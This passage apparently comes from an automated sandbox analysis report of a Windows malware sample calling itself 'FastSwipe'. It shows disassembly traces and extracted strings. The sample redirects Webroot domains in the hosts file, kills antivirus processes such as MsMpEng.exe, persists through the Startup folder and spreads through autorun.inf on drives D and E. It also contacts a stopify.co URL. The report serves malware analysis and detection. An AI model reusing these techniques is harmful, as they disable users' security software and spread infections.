                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mirage.webroot.com), ref: 00205FB9
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningtest1.webroot.com), ref: 00206010
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 origin-stage.webroot.com), ref: 00206067
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outbound7.webroot.com), ref: 002060BE
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 provisioningdev4.webroot.com), ref: 00206115
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 workspace.webroot.com), ref: 0020616C
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 email.webroot.com), ref: 002061C3
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 itpro.webroot.com), ref: 0020621A
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 webmail.webroot.com), ref: 00206271
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 brightcloud.webroot.com), ref: 002062C8
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 outlook.webroot.com), ref: 0020631F
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 android.webroot.com), ref: 00206376
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 bounce.webroot.com), ref: 002063CD
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 codingchallenge.webroot.com), ref: 00206424
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 connect.webroot.com), ref: 0020647B
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 crawler.webroot.com), ref: 002064D2
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 cwademo.webroot.com), ref: 00206529
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 enterpriseenrollment.webroot.com), ref: 00206580
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 exchangeum.webroot.com), ref: 002065D7
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 fs.webroot.com), ref: 0020662E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 ftp.webroot.com), ref: 00206685
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 intl.webroot.com), ref: 002066DC
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 m.webroot.com), ref: 00206733
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 manageprotect.webroot.com), ref: 0020678A
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 media.webroot.com), ref: 002067E1
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 myemailer.webroot.com), ref: 00206838
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 ns3.webroot.com), ref: 0020688F
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 origin.webroot.com), ref: 002068E6
                                                        • Part of subcall function 00207BE0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 00207C3F
                                                        • Part of subcall function 00207BE0: memcpy.VCRUNTIME140(00000000,?,?,?,00000000), ref: 00207CDF
                                                        • Part of subcall function 00207BE0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00207CB4
                                                        • Part of subcall function 00207BE0: Concurrency::cancel_current_task.LIBCPMT ref: 00207CF8
                                                      • OpenProcess.KERNEL32(00000001,00000000,?,?,00000018,00000026,00207B80,MsMpEng.exe,aips.exe), ref: 00206D5E
                                                      • TerminateProcess.KERNELBASE(00000000,00000000), ref: 00206D6D
                                                      • CloseHandle.KERNEL32(00000000), ref: 00206D74
                                                      • Sleep.KERNELBASE(000003E8,?,00000018,00000026,00207B80,WUDFHost.exe,vshost.exe,httpd.exe,liveUpdate.exe,GoogleCrashHandler.exe,dllhost.exe,GameBarFTServer.exe,GoogleUpdate.exe,xgTrayIcon.exe,jusched.exe,jucheck.exe), ref: 00206E0D
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00206E31
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: Sleep$_invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@$memcpy$V01@$system$??6?$basic_ostream@V01@@$Internet$?setstate@?$basic_ios@?sgetc@?$basic_streambuf@CloseConcurrency::cancel_current_taskHandleOpen$??7ios_base@std@@?good@ios_base@std@@?sputc@?$basic_streambuf@EnvironmentProcessV12@Variablememset$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?flush@?$basic_ostream@?sbumpc@?$basic_streambuf@?sputn@?$basic_streambuf@?uncaught_exception@std@@?write@?$basic_ostream@D@std@@@1@_DebuggerFileInit@?$basic_streambuf@ModuleNameOsfx@?$basic_ostream@PresentTerminateV?$basic_streambuf@getenvmalloc
                                                      • String ID: 1.1.1.1 access-tst.webroot.com$1.1.1.1 access.webroot.com$1.1.1.1 android.webroot.com$1.1.1.1 autodiscover.webroot.com$1.1.1.1 bb.webroot.com$1.1.1.1 bounce.webroot.com$1.1.1.1 bounce2.webroot.com$1.1.1.1 brightcloud.webroot.com$1.1.1.1 carbonite.webroot.com$1.1.1.1 channeledge.webroot.com$1.1.1.1 childsafe.webroot.com$1.1.1.1 cms.webroot.com$1.1.1.1 codingchallenge.webroot.com$1.1.1.1 computer-security.webroot.com$1.1.1.1 connect.webroot.com$1.1.1.1 connectuk.webroot.com$1.1.1.1 contentr.webroot.com$1.1.1.1 crawler.webroot.com$1.1.1.1 cwademo.webroot.com$1.1.1.1 de.webroot.com$1.1.1.1 dnsptest.webroot.com$1.1.1.1 e.webroot.com$1.1.1.1 email.webroot.com$1.1.1.1 encrypt.webroot.com$1.1.1.1 enterpriseenrollment.webroot.com$1.1.1.1 entupdates-cdn.webroot.com$1.1.1.1 es.webroot.com$1.1.1.1 exchangeum.webroot.com$1.1.1.1 extranet.webroot.com$1.1.1.1 fr.webroot.com$1.1.1.1 fs.webroot.com$1.1.1.1 ftp.webroot.com$1.1.1.1 intl.webroot.com$1.1.1.1 it.webroot.com$1.1.1.1 itpro.webroot.com$1.1.1.1 labs.webroot.com$1.1.1.1 lp-carbonite-sandbox.webroot.com$1.1.1.1 lp-carbonite.webroot.com$1.1.1.1 lp.webroot.com$1.1.1.1 lyncdiscover.webroot.com$1.1.1.1 m.webroot.com$1.1.1.1 mail.webroot.com$1.1.1.1 mailbox.webroot.com$1.1.1.1 manageprotect.webroot.com$1.1.1.1 media.webroot.com$1.1.1.1 mirage.webroot.com$1.1.1.1 mobiletest.webroot.com$1.1.1.1 mx.webroot.com$1.1.1.1 mydata.webroot.com$1.1.1.1 myemailer.webroot.com$1.1.1.1 myproduct.webroot.com$1.1.1.1 ncmec.webroot.com$1.1.1.1 nl.webroot.com$1.1.1.1 ns3.webroot.com$1.1.1.1 origin-stage.webroot.com$1.1.1.1 origin.webroot.com$1.1.1.1 outbound.webroot.com$1.1.1.1 outbound1.webroot.com$1.1.1.1 outbound2.webroot.com$1.1.1.1 outbound3.webroot.com$1.1.1.1 outbound4.webroot.com$1.1.1.1 outbound5.webroot.com$1.1.1.1 outbound6.webroot.com$1.1.1.1 outbound7.webroot.com$1.1.1.1 outlook.webroot.com$1.1.1.1 owauk.webroot.com$1.1.1.1 partner.webroot.com$1.1.1.1 provisioning.webroot.com$1.1.1.1 provisioningdev.webroot.com$1.1.1.1 provisioningdev1.webroot.com$1.1.1.1 provisioningdev2.webroot.com$1.1.1.1 provisioningdev4.webroot.com$1.1.1.1 provisioningtest1.webroot.com$1.1.1.1 provisioningtest2.webroot.com$1.1.1.1 provisioningtest3.webroot.com$1.1.1.1 provisioningtest4.webroot.com$1.1.1.1 provisioningtest5.webroot.com$1.1.1.1 research.webroot.com$1.1.1.1 reseller.webroot.com$1.1.1.1 sfdcstage.webroot.com$1.1.1.1 sfdctest6.webroot.com$1.1.1.1 sftp.webroot.com$1.1.1.1 sip.webroot.com$1.1.1.1 smtp-ca.webroot.com$1.1.1.1 smtp-co.webroot.com$1.1.1.1 spyware.webroot.com$1.1.1.1 sso-tst.webroot.com$1.1.1.1 stage.webroot.com$1.1.1.1 support-au.webroot.com$1.1.1.1 support-de.webroot.com$1.1.1.1 support-enterprise.webroot.com$1.1.1.1 support-es.webroot.com$1.1.1.1 support-fr.webroot.com$1.1.1.1 support-it.webroot.com$1.1.1.1 support-nl.webroot.com$1.1.1.1 technet.webroot.com$1.1.1.1 testvpn.webroot.com$1.1.1.1 tunnelfe.webroot.com$1.1.1.1 uk.webroot.com$1.1.1.1 usmail.webroot.com$1.1.1.1 vdi.webroot.com$1.1.1.1 view.webroot.com$1.1.1.1 vpn.webroot.com$1.1.1.1 vpnuk.webroot.com$1.1.1.1 webmail.webroot.com$1.1.1.1 websrv-stg.webroot.com$1.1.1.1 workspace.webroot.com$1.1.1.1 ws-stg.webroot.com$1.1.1.1 ws.webroot.com$1.1.1.1 www2.webroot.com$ABService.exe$BuildService.exe$C:\Users\$C:\Windows\System32\drivers\etc\hosts$CoordService.exe$CptHost.exe$Executable path: $Failed to retrieve username from environment variables.$GameBarFTServer.exe$GoogleCrashHandler.exe$GoogleUpdate.exe$MBAMService.exe$MSBuild.exe$MbamBgNativeMsg.exe$Microsoft.ServiceHub.Controller.exe$MsMpEng.exe$No6po noxanobatb b FastSwipe!$PerfWatson2.exe$ServiceHub.DataWarehouseHost.exe$ServiceHub.IdentityHost.exe$ServiceHub.IntellicodeModelService.exe$ServiceHub.SettingsHost.exe$ServiceHub.TestWindowStoreHost.exe$ServiceHub.ThreadedWaitDialog.exe$StandardCollector.Service.exe$Started blocking antiviruses...$Startup path: $USERNAME$USERPROFILE$Unable to retrieve executable path.$Unable to retrieve user profile directory.$WUDFHost.exe$WebViewHost.exe$Welcome to FastSwipe!$\AppData\Local\Temp\bin.exe$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup$aips.exe$aomhost64.exe$copilot-agent-win.exe$copy /v /y "%s" "%s%s"$copy /v /y "%s" D:\bin.exe$copy /v /y "%s" E:\bin.exe$dllhost.exe$echo [autorun] > D:\autorun.inf$echo [autorun] > E:\autorun.inf$echo open=bin.exe >> D:\autorun.inf$echo open=bin.exe >> E:\autorun.inf$httpd.exe$jucheck.exe$jusched.exe$liveUpdate.exe$msedgewebview2.exe$msvsmon.exe$vcpkgsrv.exe$vctip.exe$vshost.exe$xgTrayIcon.exe$zTscoder.exe$zWebview2Agent.exe$~
                                                      • API String ID: 3633377158-3337010234
                                                      • Opcode ID: cbf807b43b5a869573ca4a1fe14814e7177d24a10e0c93a49c4b98bae0bf198f
                                                      • Instruction ID: 48dcdbf6e657fa4eb215286b4228b903bc1785efd0f260ac11f6e015e76f3b7e
                                                      • Opcode Fuzzy Hash: cbf807b43b5a869573ca4a1fe14814e7177d24a10e0c93a49c4b98bae0bf198f
                                                      • Instruction Fuzzy Hash: 5B838A30E293589EDB29E764CD99B9DBA21DF56300F1081D8E44D272D3DBB83B94CE52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00201F90 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 139processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1786 201f90-202026 CreateToolhelp32Snapshot 1787 202028 1786->1787 1788 20204a-202064 Process32FirstW 1786->1788 1789 20202d-202045 call 208530 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z 1787->1789 1790 202080-202098 call 207be0 1788->1790 1791 202066-202072 CloseHandle 1788->1791 1798 202160-20217d call 20974b 1789->1798 1796 20209a 1790->1796 1797 20209c-2020a2 1790->1797 1791->1789 1796->1797 1799 2020a4 1797->1799 1800 2020a6-2020ac 1797->1800 1799->1800 1802 2020c9 1800->1802 1803 2020ae-2020b0 1800->1803 1807 2020cb-2020d4 1802->1807 1805 2020b2 1803->1805 1806 2020c5-2020c7 1803->1806 1808 2020b4-2020bb 1805->1808 1806->1807 1809 2020d6-2020eb 1807->1809 1810 202107-202109 1807->1810 1808->1802 1813 2020bd-2020c3 1808->1813 1814 2020fd-202104 call 209aef 1809->1814 1815 2020ed-2020fb 1809->1815 1811 202130-202146 Process32NextW 1810->1811 1812 20210b-202111 1810->1812 1820 202148-20214e 1811->1820 1821 202159-20215a CloseHandle 1811->1821 1818 202121-20212b call 2092a0 1812->1818 1819 202113-20211f 1812->1819 1813->1806 1813->1808 1814->1810 1815->1814 1816 202153 _invalid_parameter_noinfo_noreturn 1815->1816 1816->1821 1818->1811 1819->1811 1820->1790 1821->1798
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00202015
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00208750), ref: 0020203F
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0020205C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00202067
                                                      Strings
                                                      • Failed to retrieve first process., xrefs: 0020206D
                                                      • Failed to create process snapshot., xrefs: 00202028
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: V01@$??6?$basic_ostream@CloseCreateD@std@@@std@@FirstHandleProcess32SnapshotToolhelp32U?$char_traits@V01@@
                                                      • String ID: Failed to create process snapshot.$Failed to retrieve first process.
                                                      • API String ID: 592929778-2700033378
                                                      • Opcode ID: cad4eb1c37a330b4ee8f937443e9606736dd91407b51e55d47fe5a2c10824fa4
                                                      • Instruction ID: afd289dd1bedaf010c3aa5714763e429eb582859aad4f8f594ef5dc7e120e428
                                                      • Opcode Fuzzy Hash: cad4eb1c37a330b4ee8f937443e9606736dd91407b51e55d47fe5a2c10824fa4
                                                      • Instruction Fuzzy Hash: 8251B1B1A20315DBCB249F24DC8CBAAB7B6FB44300F20429AE509976D2D774AD98CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00202240 Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 299COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1701 202240-20229f memset 1702 2022a1 1701->1702 1703 2022a3-202379 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ call 2083f0 1701->1703 1702->1703 1706 202393-2023d8 ??7ios_base@std@@QBE_NXZ 1703->1706 1707 20237b-20238d ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z 1703->1707 1708 202413-20247f 1706->1708 1709 2023da-2023f0 call 208530 1706->1709 1707->1706 1710 202481-202484 1708->1710 1711 202486-202488 1708->1711 1721 2023f2 1709->1721 1722 2023f4-20240e call 208d10 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z 1709->1722 1713 2024a5-2024a7 1710->1713 1714 20248a-202495 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ 1711->1714 1715 20249b 1711->1715 1719 2024c3-2024c5 1713->1719 1720 2024a9-2024ab 1713->1720 1714->1715 1717 202497-202499 1714->1717 1718 20249d-2024a3 1715->1718 1717->1718 1718->1713 1725 2024e4-2024e6 1719->1725 1726 2024c7-2024c9 1719->1726 1723 2024ba 1720->1723 1724 2024ad-2024b8 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ 1720->1724 1721->1722 1736 202681-2026a7 call 2026b0 call 20974b 1722->1736 1730 2024bc 1723->1730 1724->1723 1724->1730 1728 2024e8-2024ea 1725->1728 1729 2024cb-2024dc 1725->1729 1726->1728 1726->1729 1732 202503-20250f 1728->1732 1733 2024ec-2024ee 1728->1733 1734 20254c-20254e 1729->1734 1735 2024de-2024e2 1729->1735 1730->1719 1739 202511-202516 1732->1739 1740 202518-202525 call 209570 1732->1740 1737 2024f0-2024fb ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ 1733->1737 1738 202501 1733->1738 1742 202550-20259f call 208f00 memset call 206ec0 ??7ios_base@std@@QBE_NXZ 1734->1742 1735->1742 1737->1738 1743 2024fd-2024ff 1737->1743 1738->1732 1744 20252a-20252c 1739->1744 1740->1744 1755 2025a1-2025b7 call 208530 1742->1755 1756 2025cf-2025f4 ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z call 208310 1742->1756 1743->1732 1744->1715 1748 202532-20253d ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ 1744->1748 1748->1715 1752 202543-202547 1748->1752 1752->1711 1761 2025b9 1755->1761 1762 2025bb-2025cd call 208d10 1755->1762 1763 2025f6-202608 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z 1756->1763 1764 20260e-20261e call 208530 1756->1764 1761->1762 1768 202623-20263b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 202770 1762->1768 1763->1764 1764->1768 1768->1736 1771 20263d-20264a 1768->1771 1772 202662-202664 call 209aef 1771->1772 1773 20264c-20265a 1771->1773 1776 202669-20267a 1772->1776 1773->1772 1774 20265c _invalid_parameter_noinfo_noreturn 1773->1774 1774->1772 1776->1736
                                                      APIs
                                                      • memset.VCRUNTIME140(?,00000000,000000B8,3BC7ADCC), ref: 00202291
                                                      • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 002022B0
                                                      • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000), ref: 002022D5
                                                      • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 0020230F
                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 00202333
                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,00000021,00000000), ref: 0020238D
                                                      • ??7ios_base@std@@QBE_NXZ.MSVCP140(?,00000021,00000000), ref: 002023D0
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00000000), ref: 00202408
                                                      • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000021,00000000), ref: 0020248C
                                                      • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000021,00000000), ref: 002024AF
                                                      • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000021,00000000), ref: 002024F2
                                                      • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,?,?,00000021,00000000), ref: 00202534
                                                      • memset.VCRUNTIME140(?,00000000,000000B0,?,?,?,?,00000021,00000000), ref: 0020256D
                                                      • ??7ios_base@std@@QBE_NXZ.MSVCP140(?,?,00000000,000000B0,?,?,?,?,00000021,00000000), ref: 00202597
                                                      • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(?,?,00000000,?,00000021,00000000), ref: 002025E1
                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,00000021,00000000), ref: 00202608
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00208750,?,00000021,00000000), ref: 00202625
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000021,00000000), ref: 0020265C
                                                      Strings
                                                      • Error: Unable to open file , xrefs: 002023E0
                                                      • P , xrefs: 00202368
                                                      • Error: Unable to open file for writing: , xrefs: 002025A7
                                                      • Text appended to executable successfully., xrefs: 00202614
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: U?$char_traits@$D@std@@@std@@$V01@$?sgetc@?$basic_streambuf@$??6?$basic_ostream@??7ios_base@std@@?setstate@?$basic_ios@V01@@memset$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?sbumpc@?$basic_streambuf@?write@?$basic_ostream@D@std@@@1@_Init@?$basic_streambuf@V12@V?$basic_streambuf@_invalid_parameter_noinfo_noreturn
                                                      • String ID: Error: Unable to open file $Error: Unable to open file for writing: $P $Text appended to executable successfully.
                                                      • API String ID: 3162005658-1381544702
                                                      • Opcode ID: 2e8daa763ac0018f7dc2e821ac8948bbd0ee10d81cf54c9e4d9588311104500c
                                                      • Instruction ID: fb8087b616beff69fc6d2b3e3b947fb58520a0c8424142706be5c8e1ab37de52
                                                      • Opcode Fuzzy Hash: 2e8daa763ac0018f7dc2e821ac8948bbd0ee10d81cf54c9e4d9588311104500c
                                                      • Instruction Fuzzy Hash: E9D18B70A10319CFDB14CF64DD99BEEBBB5AF04304F10429AE90AA72D2DB709A59CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00202180 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 61networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • InternetOpenW.WININET(MyApp,00000001,00000000,00000000,00000000), ref: 00202195
                                                      • InternetOpenUrlW.WININET(00000000,https://stopify.co/news.php?tid=JBB69H.jpg ,00000000,00000000,80000000,00000000), ref: 002021B2
                                                      • InternetCloseHandle.WININET(00000000), ref: 002021BD
                                                      • InternetCloseHandle.WININET(00000000), ref: 002021C4
                                                      • GetLastError.KERNEL32(00208750), ref: 002021D4
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP140(00000000), ref: 002021ED
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140 ref: 002021F5
                                                      • InternetCloseHandle.WININET(00000000), ref: 002021FC
                                                      • GetLastError.KERNEL32(00208750), ref: 0020220C
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP140(00000000), ref: 00202225
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140 ref: 0020222D
                                                      Strings
                                                      • Failed to initialize WinINet. Error code: , xrefs: 00202218
                                                      • https://stopify.co/news.php?tid=JBB69H.jpg , xrefs: 002021AC
                                                      • Failed to open URL. Error code: , xrefs: 002021E0
                                                      • MyApp, xrefs: 00202190
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: V01@$Internet$??6?$basic_ostream@D@std@@@std@@U?$char_traits@$CloseHandle$ErrorLastOpenV01@@
                                                      • String ID: Failed to initialize WinINet. Error code: $Failed to open URL. Error code: $MyApp$https://stopify.co/news.php?tid=JBB69H.jpg
                                                      • API String ID: 66322635-1443242255
                                                      • Opcode ID: 53fe1dc41c1cae1a383cba5db74faff0697ffd30d12714cc18abb3794b5632ed
                                                      • Instruction ID: 80dc1e3f26569b8d7120a147c0ec545a8269292918909ddfc8921b9448bd50a6
                                                      • Opcode Fuzzy Hash: 53fe1dc41c1cae1a383cba5db74faff0697ffd30d12714cc18abb3794b5632ed
                                                      • Instruction Fuzzy Hash: 4011A5B1760300E7DB202B74BC4EB9A765ADB45712F308346FD0AE32D3DEA05424C695
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00208530 Relevance: 13.7, APIs: 9, Instructions: 178COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1824 208530-20856d 1825 208570-208575 1824->1825 1825->1825 1826 208577-20858b 1825->1826 1827 2085a4-2085af 1826->1827 1828 20858d 1826->1828 1831 2085b2-2085bb 1827->1831 1829 20859d-2085a2 1828->1829 1830 20858f-208591 1828->1830 1829->1831 1830->1827 1832 208593-208595 1830->1832 1833 2085c2-2085d8 ?good@ios_base@std@@QBE_NXZ 1831->1833 1834 2085bd 1831->1834 1832->1827 1835 208597 1832->1835 1836 208602-20860e 1833->1836 1837 2085da-2085e5 1833->1837 1834->1833 1835->1829 1840 208599-20859b 1835->1840 1838 208610-208615 1836->1838 1839 20861a-20862f 1836->1839 1841 208600 1837->1841 1842 2085e7-2085e9 1837->1842 1844 2086fe-208719 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z ?uncaught_exception@std@@YA_NXZ 1838->1844 1845 208631-208633 1839->1845 1846 208666-208680 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z 1839->1846 1840->1827 1840->1829 1841->1836 1842->1841 1843 2085eb-2085fe ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ ?good@ios_base@std@@QBE_NXZ 1842->1843 1843->1836 1848 208723-208735 1844->1848 1849 20871b-20871d ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ 1844->1849 1845->1846 1847 208635 1845->1847 1850 208682-208684 1846->1850 1851 208686 1846->1851 1852 208637-208639 1847->1852 1853 20863b-208657 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z 1847->1853 1854 